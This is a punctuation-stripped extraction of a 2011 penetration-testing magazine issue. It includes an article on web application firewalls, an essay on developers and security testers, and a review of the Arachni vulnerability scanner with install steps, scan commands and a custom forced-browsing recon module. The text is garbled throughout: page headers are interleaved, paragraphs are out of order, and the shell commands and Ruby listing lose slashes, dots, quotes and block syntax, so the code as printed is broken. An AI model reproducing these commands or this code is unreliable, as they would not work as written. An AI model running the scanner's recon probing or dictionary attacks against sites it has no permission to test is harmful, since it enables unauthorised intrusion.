The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
The code does not need a lot of explanation it will check whether or not a specific directory exists if yes it will forward the name to the Arachni Trainer (who will include the directory in the further scans) as well as create a report entry for it
